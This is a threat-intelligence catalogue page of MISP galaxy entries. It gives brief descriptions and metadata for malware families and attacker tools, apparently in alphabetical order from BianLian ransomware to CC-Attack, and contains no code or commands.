tags | ['35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
BianLian Ransomware (Encryptor)
This Software object represents the custom Go encryptor tool (encryptor.exe
) used during intrusions conducted by the BianLian Ransomware Group.[U.S. CISA BianLian Ransomware May 2023]. The tool will skip encryption of files based on a hardcoded file extension exclusion list.[BianLian Ransomware Gang Gives It a Go! | [redacted]]
Internal MISP references
UUID 252f56c2-4c85-4a19-8451-371cb04c6ceb
which can be used as unique global reference for BianLian Ransomware (Encryptor)
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5292 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
BISCUIT
BISCUIT is a backdoor that has been used by APT1 since as early as 2007. [Mandiant APT1]
Internal MISP references
UUID 3ad98097-2d10-4aa1-9594-7e74828a3643
which can be used as unique global reference for BISCUIT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0017 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Bisonal
Bisonal is a remote access tool (RAT) that has been used by Tonto Team against public and private sector organizations in Russia, South Korea, and Japan since at least December 2010.[Unit 42 Bisonal July 2018][Talos Bisonal Mar 2020]
Internal MISP references
UUID b898816e-610f-4c2f-9045-d9f28a54ee58
which can be used as unique global reference for Bisonal
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0268 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
BitPaymer
BitPaymer is a ransomware variant first observed in August 2017 targeting hospitals in the U.K. BitPaymer uses a unique encryption key, ransom note, and contact information for each operation. BitPaymer has several indicators suggesting overlap with the Dridex malware and is often delivered via Dridex.[Crowdstrike Indrik November 2018]
Internal MISP references
UUID e7dec940-8701-4c06-9865-5b11c61c046d
which can be used as unique global reference for BitPaymer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0570 |
source | MITRE |
tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
BITSAdmin
BITSAdmin is a command line tool used to create and manage BITS Jobs. [Microsoft BITSAdmin]
Internal MISP references
UUID 52a20d3d-1edd-4f17-87f0-b77c67d260b4
which can be used as unique global reference for BITSAdmin
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0190 |
source | MITRE |
tags | ['d903e38b-600d-4736-9e3b-cf1a6e436481', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'd819ae1a-e385-49fd-88d5-f66660729ecb', '15787198-6c8b-4f79-bf50-258d55072fee', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'fdd53e62-5bf1-41f1-8bd6-b970a866c39d', 'd431939f-2dc0-410b-83f7-86c458125444', '10d09438-9ea5-405d-9b3a-36d351b5a5d9', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Black Basta
Black Basta is ransomware written in C++ that has been offered within the ransomware-as-a-service (RaaS) model since at least April 2022; there are variants that target Windows and VMWare ESXi servers. Black Basta operations have included the double extortion technique where in addition to demanding ransom for decrypting the files of targeted organizations the cyber actors also threaten to post sensitive information to a leak site if the ransom is not paid. Black Basta affiliates have targeted multiple high-value organizations, with the largest number of victims based in the U.S. Based on similarities in TTPs, leak sites, payment sites, and negotiation tactics, security researchers assess the Black Basta RaaS operators could include current or former members of the Conti group.[Palo Alto Networks Black Basta August 2022][Deep Instinct Black Basta August 2022][Minerva Labs Black Basta May 2022][Avertium Black Basta June 2022][NCC Group Black Basta June 2022][Cyble Black Basta May 2022]
Internal MISP references
UUID 0d5b24ba-68dc-50fa-8268-3012180fe374
which can be used as unique global reference for Black Basta
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1070 |
source | MITRE |
tags | ['89c5b94b-ecf4-4d53-9b74-3465086d4565', 'd903e38b-600d-4736-9e3b-cf1a6e436481', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'd819ae1a-e385-49fd-88d5-f66660729ecb', '15787198-6c8b-4f79-bf50-258d55072fee', '562e535e-19f5-4d6c-81ed-ce2aec544f09', 'fdd53e62-5bf1-41f1-8bd6-b970a866c39d', 'd431939f-2dc0-410b-83f7-86c458125444', 'dea4388a-b1f2-4f2a-9df9-108631d0d078', '2743d495-7728-4a75-9e5f-b64854039792', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
BlackCat
BlackCat is ransomware written in Rust that has been offered via the Ransomware-as-a-Service (RaaS) model. First observed November 2021, BlackCat has been used to target multiple sectors and organizations in various countries and regions in Africa, the Americas, Asia, Australia, and Europe.[Microsoft BlackCat Jun 2022][Sophos BlackCat Jul 2022][ACSC BlackCat Apr 2022]
Internal MISP references
UUID 691369e5-ef74-5ff9-bc20-34efeb4b6c5b
which can be used as unique global reference for BlackCat
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux', 'Windows'] |
software_attack_id | S1068 |
source | MITRE |
tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '5e7433ad-a894-4489-93bc-41e90da90019', '15787198-6c8b-4f79-bf50-258d55072fee', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
BLACKCOFFEE
BLACKCOFFEE is malware that has been used by several Chinese groups since at least 2013. [FireEye APT17] [FireEye Periscope March 2018]
Internal MISP references
UUID e85e2fca-9347-4448-bfc1-342f29d5d6a1
which can be used as unique global reference for BLACKCOFFEE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0069 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
BlackEnergy
BlackEnergy is a malware toolkit that has been used by both criminal and APT actors. It dates back to at least 2007 and was originally designed to create botnets for use in conducting Distributed Denial of Service (DDoS) attacks, but its use has evolved to support various plug-ins. It is well known for being used during the confrontation between Georgia and Russia in 2008, as well as in targeting Ukrainian institutions. Variants include BlackEnergy 2 and BlackEnergy 3. [F-Secure BlackEnergy 2014]
Internal MISP references
UUID 908216c7-3ad4-4e0c-9dd3-a7ed5d1c695f
which can be used as unique global reference for BlackEnergy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0089 |
source | MITRE |
tags | ['3ed3f7a6-b446-4fbc-a433-ff1d63c0e647'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
BlackLotus
BlackLotus is a Unified Extensible Firmware Interface (UEFI) bootkit that enables bypass of Secure Boot, a UEFI feature that provides verification about the state of the boot chain, even on fully updated UEFI systems. It is considered the first “in-the-wild” UEFI bootkit, as it was observed for sale on underground forums in October 2022 and researchers were able to then confirm its existence. BlackLotus bypasses UEFI Secure Boot and establishes persistence by exploiting CVE-2022-21894, and after installation, it is designed to deploy a kernel driver for further persistence and an HTTP downloader, which allows communication with a command-and-control server and loading of additional user-mode or kernel-mode payloads. BlackLotus is also capable of disabling operating system security features, and some instances of the malware include a location-based check where it will terminate if the system uses a location associated with one of several Eastern European countries.[ESET BlackLotus March 01 2023]
Internal MISP references
UUID 4cd25fac-0b5d-44e2-8df1-2c7de06b4b39
which can be used as unique global reference for BlackLotus
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5306 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '1a5a32ac-1db6-46b1-b72e-18bc3d776aed', 'df78b317-ce5d-423c-ac42-1e328ab27ffd', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
BlackMould
BlackMould is a web shell based on China Chopper for servers running Microsoft IIS. First reported in December 2019, it has been used in malicious campaigns by GALLIUM against telecommunication providers.[Microsoft GALLIUM December 2019]
Internal MISP references
UUID da348a51-d047-4144-9ba4-34d2ce964a11
which can be used as unique global reference for BlackMould
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0564 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
BlackSuit Ransomware
BlackSuit is a ransomware capable of running on Windows and Linux systems. BlackSuit is believed to be a successor to Royal, a ransomware operation which itself derives from the notorious Russia-based Conti gang. BlackSuit operations were first observed in May 2023, and although they were relatively low in number, U.S. authorities issued a warning for healthcare sector organizations due to the ransomware's suspected pedigree.[HC3 Analyst Note BlackSuit Ransomware November 2023] The number of attacks claimed by BlackSuit operators increased notably in Q2 2024.[GitHub ransomwatch]
Internal MISP references
UUID 6e200813-4379-457b-9cce-2203bed4b072
which can be used as unique global reference for BlackSuit Ransomware
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Linux', 'Windows'] |
software_attack_id | S5324 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
BLINDINGCAN
BLINDINGCAN is a remote access Trojan that has been used by the North Korean government since at least early 2020 in cyber operations against defense, engineering, and government organizations in Western Europe and the US.[US-CERT BLINDINGCAN Aug 2020][NHS UK BLINDINGCAN Aug 2020]
Internal MISP references
UUID 1af8ea81-40df-4fba-8d63-1858b8b31217
which can be used as unique global reference for BLINDINGCAN
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0520 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
BloodHound
BloodHound is an Active Directory (AD) reconnaissance tool that can reveal hidden relationships and identify attack paths within an AD environment.[GitHub Bloodhound][CrowdStrike BloodHound April 2018][FoxIT Wocao December 2019]
Internal MISP references
UUID 72658763-8077-451e-8572-38858f8cacf3
which can be used as unique global reference for BloodHound
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0521 |
source | MITRE |
tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
BLUELIGHT
BLUELIGHT is a remote access Trojan used by APT37 that was first observed in early 2021.[Volexity InkySquid BLUELIGHT August 2021]
Internal MISP references
UUID 3aaaaf86-638b-4a65-be18-c6e6dcdcdb97
which can be used as unique global reference for BLUELIGHT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0657 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Bonadan
Bonadan is a malicious version of OpenSSH which acts as a custom backdoor. Bonadan has been active since at least 2018 and combines a new cryptocurrency-mining module with the same credential-stealing module used by the Onderon family of backdoors.[ESET ForSSHe December 2018]
Internal MISP references
UUID 3793db4b-f843-4cfd-89d2-ec28b62feda5
which can be used as unique global reference for Bonadan
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux'] |
software_attack_id | S0486 |
source | MITRE |
type | ['malware'] |
BONDUPDATER
BONDUPDATER is a PowerShell backdoor used by OilRig. It was first observed in November 2017 during targeting of a Middle Eastern government organization, and an updated version was observed in August 2018 being used to target a government organization with spearphishing emails.[FireEye APT34 Dec 2017][Palo Alto OilRig Sep 2018]
Internal MISP references
UUID d8690218-5272-47d8-8189-35d3b518e66f
which can be used as unique global reference for BONDUPDATER
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0360 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
BoomBox
BoomBox is a downloader responsible for executing next stage components that has been used by APT29 since at least 2021.[MSTIC Nobelium Toolset May 2021]
Internal MISP references
UUID 9d393f6f-855e-4348-8a26-008174e3605a
which can be used as unique global reference for BoomBox
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0635 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
BOOSTWRITE
BOOSTWRITE is a loader crafted to be launched via abuse of the DLL search order of applications used by FIN7.[FireEye FIN7 Oct 2019]
Internal MISP references
UUID 74a73624-d53b-4c84-a14b-8ae964fd577c
which can be used as unique global reference for BOOSTWRITE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0415 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
BOOTRASH
BOOTRASH is a Bootkit that targets Windows operating systems. It has been used by threat actors that target the financial sector.[Mandiant M Trends 2016][FireEye Bootkits][FireEye BOOTRASH SANS]
Internal MISP references
UUID d47a4753-80f5-494e-aad7-d033aaff0d6d
which can be used as unique global reference for BOOTRASH
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0114 |
source | MITRE |
type | ['malware'] |
BoxCaon
BoxCaon is a Windows backdoor that was used by IndigoZebra in a 2021 spearphishing campaign against Afghan government officials. BoxCaon's name stems from similarities shared with the malware family xCaon.[Checkpoint IndigoZebra July 2021]
Internal MISP references
UUID d3e46011-3433-426c-83b3-61c2576d5f71
which can be used as unique global reference for BoxCaon
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0651 |
source | MITRE |
tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Brave Prince
Brave Prince is a Korean-language implant that was first observed in the wild in December 2017. It contains similar code and behavior to Gold Dragon, and was seen along with Gold Dragon and RunningRAT in operations surrounding the 2018 Pyeongchang Winter Olympics. [McAfee Gold Dragon]
Internal MISP references
UUID 51b27e2c-c737-4006-a657-195ea1a1f4f0
which can be used as unique global reference for Brave Prince
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0252 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Briba
Briba is a trojan used by Elderwood to open a backdoor and download files on to compromised hosts. [Symantec Elderwood Sept 2012] [Symantec Briba May 2012]
Internal MISP references
UUID 7942783c-73a7-413c-94d1-8981029a1c51
which can be used as unique global reference for Briba
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0204 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Brute Ratel C4
Brute Ratel C4 is a commercial red-teaming and adversarial attack simulation tool that first appeared in December 2020. Brute Ratel C4 was specifically designed to avoid detection by endpoint detection and response (EDR) and antivirus (AV) capabilities, and deploys agents called badgers to enable arbitrary command execution for lateral movement, privilege escalation, and persistence. In September 2022, a cracked version of Brute Ratel C4 was leaked in the cybercriminal underground, leading to its use by threat actors.[Dark Vortex Brute Ratel C4][Palo Alto Brute Ratel July 2022][MDSec Brute Ratel August 2022][SANS Brute Ratel October 2022][Trend Micro Black Basta October 2022]
Internal MISP references
UUID 23043b44-69a6-5cdf-8f60-5a68068680c7
which can be used as unique global reference for Brute Ratel C4
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1063 |
source | MITRE |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'e81ba503-60b0-4b64-8f20-ef93e7783796'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
BS2005
BS2005 is malware that was used by Ke3chang in spearphishing campaigns since at least 2011. [Mandiant Operation Ke3chang November 2014]
Internal MISP references
UUID c9e773de-0213-4b64-83fb-637060c8b5ed
which can be used as unique global reference for BS2005
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0014 |
source | MITRE |
type | ['malware'] |
BUBBLEWRAP
BUBBLEWRAP is a full-featured, second-stage backdoor used by the admin@338 group. It is set to run when the system boots and includes functionality to check, upload, and register plug-ins that can further enhance its capabilities. [FireEye admin@338]
Internal MISP references
UUID 2be4e3d2-e8c5-4406-8041-2c17bdb3a547
which can be used as unique global reference for BUBBLEWRAP
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0043 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
build_downer
build_downer is a downloader that has been used by BRONZE BUTLER since at least 2019.[Trend Micro Tick November 2019]
Internal MISP references
UUID c21d3e6c-0f6d-44a8-bdd5-5b3180a641c9
which can be used as unique global reference for build_downer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0471 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Bumblebee
Bumblebee is a custom loader written in C++ that has been used by multiple threat actors, including possible initial access brokers, to download and execute additional payloads since at least March 2022. Bumblebee has been linked to ransomware operations including Conti, Quantum, and Mountlocker and derived its name from the appearance of "bumblebee" in the user-agent.[Google EXOTIC LILY March 2022][Proofpoint Bumblebee April 2022][Symantec Bumblebee June 2022]
Internal MISP references
UUID cc155181-fb34-4aaf-b083-b7b57b140b7a
which can be used as unique global reference for Bumblebee
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1039 |
source | MITRE |
tags | ['aa983c81-e54b-49b3-b0dd-53cf950825b8', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f', '84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Bundlore
Bundlore is adware written for macOS that has been in use since at least 2015. Though categorized as adware, Bundlore has many features associated with more traditional backdoors.[MacKeeper Bundlore Apr 2019]
Internal MISP references
UUID e9873bf1-9619-4c62-b4cf-1009e83de186
which can be used as unique global reference for Bundlore
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0482 |
source | MITRE |
tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['malware'] |
BUSHWALK
BUSHWALK is a web shell written in Perl that was inserted into the legitimate querymanifest.cgi file on compromised Ivanti Connect Secure VPNs during Cutting Edge.[Mandiant Cutting Edge Part 2 January 2024][Mandiant Cutting Edge Part 3 February 2024]
Internal MISP references
UUID 44ed9567-2cb6-590e-b332-154557fb93f9
which can be used as unique global reference for BUSHWALK
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network'] |
software_attack_id | S1118 |
source | MITRE |
type | ['malware'] |
Cachedump
Cachedump is a publicly-available tool that program extracts cached password hashes from a system’s registry. [Mandiant APT1]
Internal MISP references
UUID 7c03fb92-3cd8-4ce4-a1e0-75e47465e4bc
which can be used as unique global reference for Cachedump
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0119 |
source | MITRE |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
CACTUS Ransomware
This Software object reflects the TTPs associated with the CACTUS ransomware binary, a malware that researchers believe has been used since at least March 2023.[Kroll CACTUS Ransomware May 10 2023] Other pre- and post-exploit TTPs associated with threat actors known to deploy CACTUS can be found in the separate dedicated Group object.
Internal MISP references
UUID ad51e7c6-7d3c-4c5d-a7e2-e50afb11a0ca
which can be used as unique global reference for CACTUS Ransomware
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5309 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', 'a2e000da-8181-4327-bacd-32013dbd3654', '562e535e-19f5-4d6c-81ed-ce2aec544f09', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
CaddyWiper
CaddyWiper is a destructive data wiper that has been used in attacks against organizations in Ukraine since at least March 2022.[ESET CaddyWiper March 2022][Cisco CaddyWiper March 2022]
Internal MISP references
UUID 62d0ddcd-790d-4d2d-9d94-276f54b40cf0
which can be used as unique global reference for CaddyWiper
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0693 |
source | MITRE |
tags | ['2e621fc5-dea4-4cb9-987e-305845986cd3'] |
type | ['malware'] |
Cadelspy
Cadelspy is a backdoor that has been used by APT39.[Symantec Chafer Dec 2015]
Internal MISP references
UUID c8a51b39-6906-4381-9bb4-4e9e612aa085
which can be used as unique global reference for Cadelspy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0454 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
CALENDAR
CALENDAR is malware used by APT1 that mimics legitimate Gmail Calendar traffic. [Mandiant APT1]
Internal MISP references
UUID ad859a79-c183-44f6-a89a-f734710672a9
which can be used as unique global reference for CALENDAR
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0025 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Calisto
Calisto is a macOS Trojan that opens a backdoor on the compromised machine. Calisto is believed to have first been developed in 2016. [Securelist Calisto July 2018] [Symantec Calisto July 2018]
Internal MISP references
UUID 6b5b408c-4f9d-4137-bfb1-830d12e9736c
which can be used as unique global reference for Calisto
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0274 |
source | MITRE |
type | ['malware'] |
CallMe
CallMe is a Trojan designed to run on Apple OSX. It is based on a publicly available tool called Tiny SHell. [Scarlet Mimic Jan 2016]
Internal MISP references
UUID 352ee271-89e6-4d3f-9c26-98dbab0e2986
which can be used as unique global reference for CallMe
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0077 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Cannon
Cannon is a Trojan with variants written in C# and Delphi. It was first observed in April 2018. [Unit42 Cannon Nov 2018][Unit42 Sofacy Dec 2018]
Internal MISP references
UUID 790e931d-2571-496d-9f48-322774a7d482
which can be used as unique global reference for Cannon
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0351 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Carbanak
Carbanak is a full-featured, remote backdoor used by a group of the same name (Carbanak). It is intended for espionage, data exfiltration, and providing remote access to infected machines. [Kaspersky Carbanak] [FireEye CARBANAK June 2017]
Internal MISP references
UUID 4cb9294b-9e4c-41b9-b640-46213a01952d
which can be used as unique global reference for Carbanak
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0030 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Carberp
Carberp is a credential and information stealing malware that has been active since at least 2009. Carberp's source code was leaked online in 2013, and subsequently used as the foundation for the Carbanak backdoor.[Trend Micro Carberp February 2014][KasperskyCarbanak][RSA Carbanak November 2017]
Internal MISP references
UUID df9491fd-5e24-4548-8e21-1268dce59d1f
which can be used as unique global reference for Carberp
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0484 |
source | MITRE |
type | ['malware'] |
Carbon
Carbon is a sophisticated, second-stage backdoor and framework that can be used to steal sensitive information from victims. Carbon has been selectively used by Turla to target government and foreign affairs-related organizations in Central Asia.[ESET Carbon Mar 2017][Securelist Turla Oct 2018]
Internal MISP references
UUID 61f5d19c-1da2-43d1-ab20-51eacbca71f2
which can be used as unique global reference for Carbon
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0335 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Cardinal RAT
Cardinal RAT is a potentially low volume remote access trojan (RAT) observed since December 2015. Cardinal RAT is notable for its unique utilization of uncompiled C# source code and the Microsoft Windows built-in csc.exe compiler.[PaloAlto CardinalRat Apr 2017]
Internal MISP references
UUID fa23acef-3034-43ee-9610-4fc322f0d80b
which can be used as unique global reference for Cardinal RAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0348 |
source | MITRE |
tags | ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59'] |
type | ['malware'] |
CARROTBALL
CARROTBALL is an FTP downloader utility that has been in use since at least 2019. CARROTBALL has been used as a downloader to install SYSCON.[Unit 42 CARROTBAT January 2020]
Internal MISP references
UUID 84bb4068-b441-435e-8535-02a458ffd50b
which can be used as unique global reference for CARROTBALL
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0465 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['tool'] |
CARROTBAT
CARROTBAT is a customized dropper that has been in use since at least 2017. CARROTBAT has been used to install SYSCON and has infrastructure overlap with KONNI.[Unit 42 CARROTBAT November 2018][Unit 42 CARROTBAT January 2020]
Internal MISP references
UUID aefa893d-fc6e-41a9-8794-2700049db9e5
which can be used as unique global reference for CARROTBAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0462 |
source | MITRE |
type | ['malware'] |
Catchamas
Catchamas is a Windows Trojan that steals information from compromised systems. [Symantec Catchamas April 2018]
Internal MISP references
UUID 04deccb5-9850-45c3-a900-5d7039a94190
which can be used as unique global reference for Catchamas
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0261 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Caterpillar WebShell
Caterpillar WebShell is a self-developed Web Shell tool created by the group Volatile Cedar.[ClearSky Lebanese Cedar Jan 2021]
Internal MISP references
UUID ee88afaa-88bc-4c20-906f-332866388549
which can be used as unique global reference for Caterpillar WebShell
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0572 |
source | MITRE |
tags | ['311abf64-a9cc-4c6a-b778-32c5df5658be'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
CC-Attack
CC-Attack is a publicly available script that automates the use of open, external proxy servers as part of denial of service flood attacks. Its use has been promoted among the members of the Killnet hacktivist collective.[Flashpoint Glossary Killnet]
Internal MISP references
UUID 7664bfa5-8477-4903-9103-1144113fca36
which can be used as unique global reference for CC-Attack
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Linux', 'Windows'] |
software_attack_id | S5062 |
source | Tidal Cyber |
tags | ['62bde669-3020-4682-be68-36c83b2588a4'] |
type | ['malware'] |
Related clusters
